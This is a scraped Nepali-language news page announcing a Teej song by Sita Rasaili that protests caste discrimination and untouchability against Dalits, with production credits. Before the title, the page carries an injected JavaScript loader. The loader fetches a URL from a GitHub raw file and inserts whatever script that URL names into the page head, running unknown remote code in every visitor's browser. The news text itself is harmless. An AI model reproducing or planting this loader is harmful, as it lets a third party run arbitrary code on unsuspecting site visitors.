;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); जातीय भेदभावविरुद्धको तीज गीत सार्वजनिक (भिडियोसहित) – जुनेली न्युज
मङ्लबार, असार ११, २०८२
  • होमपेज
  • जातीय भेदभावविरुद्धको तीज गीत सार्वजनिक (भिडियोसहित)
जुनेली बिशेष

जातीय भेदभावविरुद्धको तीज गीत सार्वजनिक (भिडियोसहित)

गीत

साउन २९,

काठमाडौं । नेपाली हिन्दु नारीको महान चाड तीज नजिकिएको छ। सर्जकहरूले​ नयाँ गीत सार्वजनिक गर्ने क्रम जारी छ। यही अवसरमा गायिका सीता रसाईलीले तीजको अवसरमा ‘वर्ष दिन बितेको’ गीत सार्वजनिक गरेकी छिन्।

श्रमजीवी दलित समुदाय युगौँदेखि जातीय भेदभावको चरम शोषण, दमनरुपी शिकारीको पन्जामा जकडिएको विषयलाई मुल कथा बनाएर बनाएको गीतमा बिबि अनुरागीको शब्द र संगीत रहेको छ।

गीतमा अंजली अधिकारी, उत्सा र बन्दना नेपालको अभिनय रहेको छ भने निर्देशन भने शंकर बिसिले गरेका छन्। यो गीत मुलतः छुवाछूत र जातिय विभेदविद्धमा रहेको छ । गीतको सम्पादन नविन घर्तीमगरले गरेका हुन।
भिडियो हेर्नको लागि याँहा थिच्नुहोस्

 

 

 

फेसबुक प्रतिक्रियाहरु